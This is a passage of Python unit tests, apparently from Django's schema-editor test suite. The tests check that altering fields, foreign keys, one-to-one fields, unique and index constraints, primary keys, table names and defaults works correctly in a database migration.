editor.alter_field(UniqueTest, old_field, new_field, strict=True) with self.assertRaises(IntegrityError): UniqueTest.objects.create(year=None, slug='bbb') def test_alter_null_to_not_null(self): """ #23609 - Tests handling of default values when altering from NULL to NOT NULL. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertTrue(columns['height'][1][6]) # Create some test data Author.objects.create(name='Not null author', height=12) Author.objects.create(name='Null author') # Verify null value self.assertEqual(Author.objects.get(name='Not null author').height, 12) self.assertIsNone(Author.objects.get(name='Null author').height) # Alter the height field to NOT NULL with default old_field = Author._meta.get_field("height") new_field = PositiveIntegerField(default=42) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertFalse(columns['height'][1][6]) # Verify default value self.assertEqual(Author.objects.get(name='Not null author').height, 12) self.assertEqual(Author.objects.get(name='Null author').height, 42) def test_alter_charfield_to_null(self): """ #24307 - Should skip an alter statement on databases with interprets_empty_strings_as_null when changing a CharField to null. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Change the CharField to null old_field = Author._meta.get_field('name') new_field = copy(old_field) new_field.null = True with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) def test_alter_textfield_to_null(self): """ #24307 - Should skip an alter statement on databases with interprets_empty_strings_as_null when changing a TextField to null. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Note) # Change the TextField to null old_field = Note._meta.get_field('info') new_field = copy(old_field) new_field.null = True with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field) @skipUnlessDBFeature('supports_combined_alters') def test_alter_null_to_not_null_keeping_default(self): """ #23738 - Can change a nullable field with default to non-nullable with the same default. """ # Create the table with connection.schema_editor() as editor: editor.create_model(AuthorWithDefaultHeight) # Ensure the field is right to begin with columns = self.column_classes(AuthorWithDefaultHeight) self.assertTrue(columns['height'][1][6]) # Alter the height field to NOT NULL keeping the previous default old_field = AuthorWithDefaultHeight._meta.get_field("height") new_field = PositiveIntegerField(default=42) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(AuthorWithDefaultHeight, old_field, new_field) # Ensure the field is right afterwards columns = self.column_classes(AuthorWithDefaultHeight) self.assertFalse(columns['height'][1][6]) @skipUnlessDBFeature('supports_foreign_keys') def test_alter_fk(self): """ Tests altering of FKs """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the field is right to begin with columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") # Alter the FK old_field = Book._meta.get_field("author") new_field = ForeignKey(Author, CASCADE, 
editable=False) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_to_fk(self): """ #24447 - Tests adding a FK constraint for an existing column """ class LocalBook(Model): author = IntegerField() title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalBook] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(LocalBook) # Ensure no FK constraint exists constraints = self.get_constraints(LocalBook._meta.db_table) for name, details in constraints.items(): if details['foreign_key']: self.fail('Found an unexpected FK constraint to %s' % details['columns']) old_field = LocalBook._meta.get_field("author") new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(LocalBook, old_field, new_field, strict=True) constraints = self.get_constraints(LocalBook._meta.db_table) # Ensure FK constraint exists for name, details in constraints.items(): if details['foreign_key'] and details['columns'] == ["author_id"]: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_o2o_to_fk(self): """ #24163 - 
Tests altering of OneToOneField to ForeignKey """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(BookWithO2O) # Ensure the field is right to begin with columns = self.column_classes(BookWithO2O) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is unique author = Author.objects.create(name="Joe") BookWithO2O.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) with self.assertRaises(IntegrityError): BookWithO2O.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) BookWithO2O.objects.all().delete() # Make sure the FK constraint is present constraints = self.get_constraints(BookWithO2O._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") # Alter the OneToOneField to ForeignKey old_field = BookWithO2O._meta.get_field("author") new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(BookWithO2O, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is not unique anymore Book.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) Book.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) # Make sure the FK constraint is still present constraints = self.get_constraints(Book._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, 
"No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_fk_to_o2o(self): """ #24163 - Tests altering of ForeignKey to OneToOneField """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the field is right to begin with columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is not unique author = Author.objects.create(name="Joe") Book.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) Book.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) Book.objects.all().delete() # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") # Alter the ForeignKey to OneToOneField old_field = Book._meta.get_field("author") new_field = OneToOneField(Author, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(BookWithO2O) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is unique now BookWithO2O.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) with self.assertRaises(IntegrityError): BookWithO2O.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) # Make sure the FK constraint is present constraints = self.get_constraints(BookWithO2O._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and 
details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") def test_alter_implicit_id_to_explicit(self): """ Should be able to convert an implicit "id" field to an explicit "id" primary key field. """ with connection.schema_editor() as editor: editor.create_model(Author) old_field = Author._meta.get_field("id") new_field = IntegerField(primary_key=True) new_field.set_attributes_from_name("id") new_field.model = Author with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # This will fail if DROP DEFAULT is inadvertently executed on this # field which drops the id sequence, at least on PostgreSQL. Author.objects.create(name='Foo') def test_alter_int_pk_to_autofield_pk(self): """ Should be able to rename an IntegerField(primary_key=True) to AutoField(primary_key=True). """ with connection.schema_editor() as editor: editor.create_model(IntegerPK) old_field = IntegerPK._meta.get_field('i') new_field = AutoField(primary_key=True) new_field.model = IntegerPK new_field.set_attributes_from_name('i') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) def test_alter_int_pk_to_int_unique(self): """ Should be able to rename an IntegerField(primary_key=True) to IntegerField(unique=True). 
""" class IntegerUnique(Model): i = IntegerField(unique=True) j = IntegerField(primary_key=True) class Meta: app_label = 'schema' apps = new_apps db_table = 'INTEGERPK' with connection.schema_editor() as editor: editor.create_model(IntegerPK) # model requires a new PK old_field = IntegerPK._meta.get_field('j') new_field = IntegerField(primary_key=True) new_field.model = IntegerPK new_field.set_attributes_from_name('j') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) old_field = IntegerPK._meta.get_field('i') new_field = IntegerField(unique=True) new_field.model = IntegerPK new_field.set_attributes_from_name('i') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) # Ensure unique constraint works. IntegerUnique.objects.create(i=1, j=1) with self.assertRaises(IntegrityError): IntegerUnique.objects.create(i=1, j=2) def test_rename(self): """ Tests simple altering of fields """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") self.assertNotIn("display_name", columns) # Alter the name field's name old_field = Author._meta.get_field("name") new_field = CharField(max_length=254) new_field.set_attributes_from_name("display_name") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['display_name'][0], "CharField") self.assertNotIn("name", columns) @skipIfDBFeature('interprets_empty_strings_as_nulls') def test_rename_keep_null_status(self): """ Renaming a field shouldn't affect the not null status. 
""" with connection.schema_editor() as editor: editor.create_model(Note) with self.assertRaises(IntegrityError): Note.objects.create(info=None) old_field = Note._meta.get_field("info") new_field = TextField() new_field.set_attributes_from_name("detail_info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) columns = self.column_classes(Note) self.assertEqual(columns['detail_info'][0], "TextField") self.assertNotIn("info", columns) with self.assertRaises(IntegrityError): NoteRename.objects.create(detail_info=None) def _test_m2m_create(self, M2MFieldClass): """ Tests M2M fields on models during creation """ class LocalBookWithM2M(Model): author = ForeignKey(Author, CASCADE) title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() tags = M2MFieldClass("TagM2MTest", related_name="books") class Meta: app_label = 'schema' apps = new_apps self.local_models = [ LocalBookWithM2M, LocalBookWithM2M._meta.get_field('tags').remote_field.through, ] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(TagM2MTest) editor.create_model(LocalBookWithM2M) # Ensure there is now an m2m table there columns = self.column_classes(LocalBookWithM2M._meta.get_field("tags").remote_field.through) self.assertEqual(columns['tagm2mtest_id'][0], "IntegerField") def test_m2m_create(self): self._test_m2m_create(ManyToManyField) def test_m2m_create_custom(self): self._test_m2m_create(CustomManyToManyField) def test_m2m_create_inherited(self): self._test_m2m_create(InheritedManyToManyField) def _test_m2m_create_through(self, M2MFieldClass): """ Tests M2M fields on models during creation with through models """ class LocalTagThrough(Model): book = ForeignKey("schema.LocalBookWithM2MThrough", CASCADE) tag = ForeignKey("schema.TagM2MTest", CASCADE) class Meta: app_label = 'schema' apps = new_apps class LocalBookWithM2MThrough(Model): tags = M2MFieldClass("TagM2MTest", 
related_name="books", through=LocalTagThrough) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalTagThrough, LocalBookWithM2MThrough] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalTagThrough) editor.create_model(TagM2MTest) editor.create_model(LocalBookWithM2MThrough) # Ensure there is now an m2m table there columns = self.column_classes(LocalTagThrough) self.assertEqual(columns['book_id'][0], "IntegerField") self.assertEqual(columns['tag_id'][0], "IntegerField") def test_m2m_create_through(self): self._test_m2m_create_through(ManyToManyField) def test_m2m_create_through_custom(self): self._test_m2m_create_through(CustomManyToManyField) def test_m2m_create_through_inherited(self): self._test_m2m_create_through(InheritedManyToManyField) def _test_m2m(self, M2MFieldClass): """ Tests adding/removing M2M fields on models """ class LocalAuthorWithM2M(Model): name = CharField(max_length=255) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorWithM2M] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalAuthorWithM2M) editor.create_model(TagM2MTest) # Create an M2M field new_field = M2MFieldClass("schema.TagM2MTest", related_name="authors") new_field.contribute_to_class(LocalAuthorWithM2M, "tags") self.local_models += [new_field.remote_field.through] # Ensure there's no m2m table there self.assertRaises(DatabaseError, self.column_classes, new_field.remote_field.through) # Add the field with connection.schema_editor() as editor: editor.add_field(LocalAuthorWithM2M, new_field) # Ensure there is now an m2m table there columns = self.column_classes(new_field.remote_field.through) self.assertEqual(columns['tagm2mtest_id'][0], "IntegerField") # "Alter" the field. This should not rename the DB table to itself. 
with connection.schema_editor() as editor: editor.alter_field(LocalAuthorWithM2M, new_field, new_field) # Remove the M2M table again with connection.schema_editor() as editor: editor.remove_field(LocalAuthorWithM2M, new_field) # Ensure there's no m2m table there self.assertRaises(DatabaseError, self.column_classes, new_field.remote_field.through) def test_m2m(self): self._test_m2m(ManyToManyField) def test_m2m_custom(self): self._test_m2m(CustomManyToManyField) def test_m2m_inherited(self): self._test_m2m(InheritedManyToManyField) def _test_m2m_through_alter(self, M2MFieldClass): """ Tests altering M2Ms with explicit through models (should no-op) """ class LocalAuthorTag(Model): author = ForeignKey("schema.LocalAuthorWithM2MThrough", CASCADE) tag = ForeignKey("schema.TagM2MTest", CASCADE) class Meta: app_label = 'schema' apps = new_apps class LocalAuthorWithM2MThrough(Model): name = CharField(max_length=255) tags = M2MFieldClass("schema.TagM2MTest", related_name="authors", through=LocalAuthorTag) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorTag, LocalAuthorWithM2MThrough] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalAuthorTag) editor.create_model(LocalAuthorWithM2MThrough) editor.create_model(TagM2MTest) # Ensure the m2m table is there self.assertEqual(len(self.column_classes(LocalAuthorTag)), 3) # "Alter" the field's blankness. This should not actually do anything. 
old_field = LocalAuthorWithM2MThrough._meta.get_field("tags") new_field = M2MFieldClass("schema.TagM2MTest", related_name="authors", through=LocalAuthorTag) new_field.contribute_to_class(LocalAuthorWithM2MThrough, "tags") with connection.schema_editor() as editor: editor.alter_field(LocalAuthorWithM2MThrough, old_field, new_field) # Ensure the m2m table is still there self.assertEqual(len(self.column_classes(LocalAuthorTag)), 3) def test_m2m_through_alter(self): self._test_m2m_through_alter(ManyToManyField) def test_m2m_through_alter_custom(self): self._test_m2m_through_alter(CustomManyToManyField) def test_m2m_through_alter_inherited(self): self._test_m2m_through_alter(InheritedManyToManyField) def _test_m2m_repoint(self, M2MFieldClass): """ Tests repointing M2M fields """ class LocalBookWithM2M(Model): author = ForeignKey(Author, CASCADE) title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() tags = M2MFieldClass("TagM2MTest", related_name="books") class Meta: app_label = 'schema' apps = new_apps self.local_models = [ LocalBookWithM2M, LocalBookWithM2M._meta.get_field('tags').remote_field.through, ] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(LocalBookWithM2M) editor.create_model(TagM2MTest) editor.create_model(UniqueTest) # Ensure the M2M exists and points to TagM2MTest constraints = self.get_constraints(LocalBookWithM2M._meta.get_field("tags").remote_field.through._meta.db_table) if connection.features.supports_foreign_keys: for name, details in constraints.items(): if details['columns'] == ["tagm2mtest_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tagm2mtest', 'id')) break else: self.fail("No FK constraint for tagm2mtest_id found") # Repoint the M2M old_field = LocalBookWithM2M._meta.get_field("tags") new_field = M2MFieldClass(UniqueTest) new_field.contribute_to_class(LocalBookWithM2M, "uniques") self.local_models += 
[new_field.remote_field.through] with connection.schema_editor() as editor: editor.alter_field(LocalBookWithM2M, old_field, new_field) # Ensure old M2M is gone self.assertRaises(DatabaseError, self.column_classes, LocalBookWithM2M._meta.get_field("tags").remote_field.through) # Ensure the new M2M exists and points to UniqueTest constraints = self.get_constraints(new_field.remote_field.through._meta.db_table) if connection.features.supports_foreign_keys: for name, details in constraints.items(): if details['columns'] == ["uniquetest_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_uniquetest', 'id')) break else: self.fail("No FK constraint for uniquetest_id found") def test_m2m_repoint(self): self._test_m2m_repoint(ManyToManyField) def test_m2m_repoint_custom(self): self._test_m2m_repoint(CustomManyToManyField) def test_m2m_repoint_inherited(self): self._test_m2m_repoint(InheritedManyToManyField) @skipUnlessDBFeature('supports_column_check_constraints') def test_check_constraints(self): """ Tests creating/deleting CHECK constraints """ # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the constraint exists constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: break else: self.fail("No check constraint for height found") # Alter the column to remove it old_field = Author._meta.get_field("height") new_field = IntegerField(null=True, blank=True) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: self.fail("Check constraint for height found") # Alter the column to re-add it new_field2 = Author._meta.get_field("height") with 
connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: break else: self.fail("No check constraint for height found") def test_unique(self): """ Tests removing and adding unique constraints to a single column. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure the field is unique to begin with Tag.objects.create(title="foo", slug="foo") self.assertRaises(IntegrityError, Tag.objects.create, title="bar", slug="foo") Tag.objects.all().delete() # Alter the slug field to be non-unique old_field = Tag._meta.get_field("slug") new_field = SlugField(unique=False) new_field.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(Tag, old_field, new_field, strict=True) # Ensure the field is no longer unique Tag.objects.create(title="foo", slug="foo") Tag.objects.create(title="bar", slug="foo") Tag.objects.all().delete() # Alter the slug field to be unique new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(Tag, new_field, new_field2, strict=True) # Ensure the field is unique again Tag.objects.create(title="foo", slug="foo") self.assertRaises(IntegrityError, Tag.objects.create, title="bar", slug="foo") Tag.objects.all().delete() # Rename the field new_field3 = SlugField(unique=True) new_field3.set_attributes_from_name("slug2") with connection.schema_editor() as editor: editor.alter_field(Tag, new_field2, new_field3, strict=True) # Ensure the field is still unique TagUniqueRename.objects.create(title="foo", slug2="foo") self.assertRaises(IntegrityError, TagUniqueRename.objects.create, title="bar", slug2="foo") Tag.objects.all().delete() def test_unique_together(self): """ Tests removing and adding 
unique_together constraints on a model. """ # Create the table with connection.schema_editor() as editor: editor.create_model(UniqueTest) # Ensure the fields are unique to begin with UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.create(year=2011, slug="foo") UniqueTest.objects.create(year=2011, slug="bar") self.assertRaises(IntegrityError, UniqueTest.objects.create, year=2012, slug="foo") UniqueTest.objects.all().delete() # Alter the model to its non-unique-together companion with connection.schema_editor() as editor: editor.alter_unique_together(UniqueTest, UniqueTest._meta.unique_together, []) # Ensure the fields are no longer unique UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.all().delete() # Alter it back new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_unique_together(UniqueTest, [], UniqueTest._meta.unique_together) # Ensure the fields are unique again UniqueTest.objects.create(year=2012, slug="foo") self.assertRaises(IntegrityError, UniqueTest.objects.create, year=2012, slug="foo") UniqueTest.objects.all().delete() def test_unique_together_with_fk(self): """ Tests removing and adding unique_together constraints that include a foreign key. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the fields are unique to begin with self.assertEqual(Book._meta.unique_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_unique_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_unique_together(Book, [['author', 'title']], []) def test_unique_together_with_fk_with_existing_index(self): """ Tests removing and adding unique_together constraints that include a foreign key, where the foreign key is added after the model is created. """ # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(BookWithoutAuthor) new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name('author') editor.add_field(BookWithoutAuthor, new_field) # Ensure the fields aren't unique to begin with self.assertEqual(Book._meta.unique_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_unique_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_unique_together(Book, [['author', 'title']], []) def test_index_together(self): """ Tests removing and adding index_together constraints on a model. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure there's no index on the year/slug columns first self.assertEqual( False, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) # Alter the model to add an index with connection.schema_editor() as editor: editor.alter_index_together(Tag, [], [("slug", "title")]) # Ensure there is now an index self.assertEqual( True, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) # Alter it back new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_index_together(Tag, [("slug", "title")], []) # Ensure there's no index self.assertEqual( False, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) def test_index_together_with_fk(self): """ Tests removing and adding index_together constraints that include a foreign key. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the fields are unique to begin with self.assertEqual(Book._meta.index_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_index_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_index_together(Book, [['author', 'title']], []) def test_create_index_together(self): """ Tests creating models with index_together already defined """ # Create the table with connection.schema_editor() as editor: editor.create_model(TagIndexed) # Ensure there is an index self.assertEqual( True, any( c["index"] for c in self.get_constraints("schema_tagindexed").values() if c['columns'] == ["slug", "title"] ), ) def test_db_table(self): """ Tests renaming of the table """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the table is there to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") # Alter the table with connection.schema_editor() as editor: editor.alter_db_table(Author, "schema_author", "schema_otherauthor") # Ensure the table is there afterwards Author._meta.db_table = "schema_otherauthor" columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") # Alter the table again with connection.schema_editor() as editor: editor.alter_db_table(Author, "schema_otherauthor", "schema_author") # Ensure the table is still there Author._meta.db_table = "schema_author" columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") def test_indexes(self): """ Tests creation/altering of indexes """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the table is there and has the right index self.assertIn( "title", 
self.get_indexes(Book._meta.db_table), ) # Alter to remove the index old_field = Book._meta.get_field("title") new_field = CharField(max_length=100, db_index=False) new_field.set_attributes_from_name("title") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the table is there and has no index self.assertNotIn( "title", self.get_indexes(Book._meta.db_table), ) # Alter to re-add the index new_field2 = Book._meta.get_field("title") with connection.schema_editor() as editor: editor.alter_field(Book, new_field, new_field2, strict=True) # Ensure the table is there and has the index again self.assertIn( "title", self.get_indexes(Book._meta.db_table), ) # Add a unique column, verify that creates an implicit index new_field3 = BookWithSlug._meta.get_field("slug") with connection.schema_editor() as editor: editor.add_field(Book, new_field3) self.assertIn( "slug", self.get_indexes(Book._meta.db_table), ) # Remove the unique, check the index goes with it new_field4 = CharField(max_length=20, unique=False) new_field4.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(BookWithSlug, new_field3, new_field4, strict=True) self.assertNotIn( "slug", self.get_indexes(Book._meta.db_table), ) def test_primary_key(self): """ Tests altering of the primary key """ # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure the table is there and has the right PK self.assertTrue( self.get_indexes(Tag._meta.db_table)['id']['primary_key'], ) # Alter to change the PK id_field = Tag._meta.get_field("id") old_field = Tag._meta.get_field("slug") new_field = SlugField(primary_key=True) new_field.set_attributes_from_name("slug") new_field.model = Tag with connection.schema_editor() as editor: editor.remove_field(Tag, id_field) editor.alter_field(Tag, old_field, new_field) # Ensure the PK changed self.assertNotIn( 'id', self.get_indexes(Tag._meta.db_table), ) 
self.assertTrue( self.get_indexes(Tag._meta.db_table)['slug']['primary_key'], ) def test_context_manager_exit(self): """ Ensures transaction is correctly closed when an error occurs inside a SchemaEditor context. """ class SomeError(Exception): pass try: with connection.schema_editor(): raise SomeError except SomeError: self.assertFalse(connection.in_atomic_block) @skipUnlessDBFeature('supports_foreign_keys') def test_foreign_key_index_long_names_regression(self): """ Regression test for #21497. Only affects databases that supports foreign keys. """ # Create the table with connection.schema_editor() as editor: editor.create_model(AuthorWithEvenLongerName) editor.create_model(BookWithLongName) # Find the properly shortened column name column_name = connection.ops.quote_name("author_foreign_key_with_really_long_field_name_id") column_name = column_name[1:-1].lower() # unquote, and, for Oracle, un-upcase # Ensure the table is there and has an index on the column self.assertIn( column_name, self.get_indexes(BookWithLongName._meta.db_table), ) @skipUnlessDBFeature('supports_foreign_keys') def test_add_foreign_key_long_names(self): """ Regression test for #23009. Only affects databases that supports foreign keys. 
""" # Create the initial tables with connection.schema_editor() as editor: editor.create_model(AuthorWithEvenLongerName) editor.create_model(BookWithLongName) # Add a second FK, this would fail due to long ref name before the fix new_field = ForeignKey(AuthorWithEvenLongerName, CASCADE, related_name="something") new_field.set_attributes_from_name("author_other_really_long_named_i_mean_so_long_fk") with connection.schema_editor() as editor: editor.add_field(BookWithLongName, new_field) def test_add_foreign_object(self): with connection.schema_editor() as editor: editor.create_model(BookForeignObj) new_field = ForeignObject(Author, on_delete=CASCADE, from_fields=['author_id'], to_fields=['id']) new_field.set_attributes_from_name('author') with connection.schema_editor() as editor: editor.add_field(BookForeignObj, new_field) def test_creation_deletion_reserved_names(self): """ Tries creating a model's table, and then deleting it when it has a SQL reserved name. """ # Create the table with connection.schema_editor() as editor: try: editor.create_model(Thing) except OperationalError as e: self.fail("Errors when applying initial migration for a model " "with a table named after a SQL reserved word: %s" % e) # Check that it's there list(Thing.objects.all()) # Clean up that table with connection.schema_editor() as editor: editor.delete_model(Thing) # Check that it's gone self.assertRaises( DatabaseError, lambda: list(Thing.objects.all()), ) @skipUnlessDBFeature('supports_foreign_keys') def test_remove_constraints_capital_letters(self): """ #23065 - Constraint names must be quoted if they contain capital letters. 
""" def get_field(*args, **kwargs): kwargs['db_column'] = "CamelCase" field = kwargs.pop('field_class', IntegerField)(*args, **kwargs) field.set_attributes_from_name("CamelCase") return field model = Author field = get_field() table = model._meta.db_table column = field.column with connection.schema_editor() as editor: editor.create_model(model) editor.add_field(model, field) editor.execute( editor.sql_create_index % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseIndex"), "columns": editor.quote_name(column), "extra": "", } ) editor.alter_field(model, get_field(db_index=True), field) editor.execute( editor.sql_create_unique % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseUniqConstraint"), "columns": editor.quote_name(field.column), } ) editor.alter_field(model, get_field(unique=True), field) editor.execute( editor.sql_create_fk % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseFKConstraint"), "column": editor.quote_name(column), "to_table": editor.quote_name(table), "to_column": editor.quote_name(model._meta.auto_field.column), } ) editor.alter_field(model, get_field(Author, CASCADE, field_class=ForeignKey), field) def test_add_field_use_effective_default(self): """ #23987 - effective_default() should be used as the field default when adding a new field. 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no surname field columns = self.column_classes(Author) self.assertNotIn("surname", columns) # Create a row Author.objects.create(name='Anonymous1') # Add new CharField to ensure default will be used from effective_default new_field = CharField(max_length=15, blank=True) new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure field was added with the right default with connection.cursor() as cursor: cursor.execute("SELECT surname FROM schema_author;") item = cursor.fetchall()[0] self.assertEqual(item[0], None if connection.features.interprets_empty_strings_as_nulls else '') def test_add_field_default_dropped(self): # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no surname field columns = self.column_classes(Author) self.assertNotIn("surname", columns) # Create a row Author.objects.create(name='Anonymous1') # Add new CharField with a default new_field = CharField(max_length=15, blank=True, default='surname default') new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure field was added with the right default with connection.cursor() as cursor: cursor.execute("SELECT surname FROM schema_author;") item = cursor.fetchall()[0] self.assertEqual(item[0], 'surname default') # And that the default is no longer set in the database. 
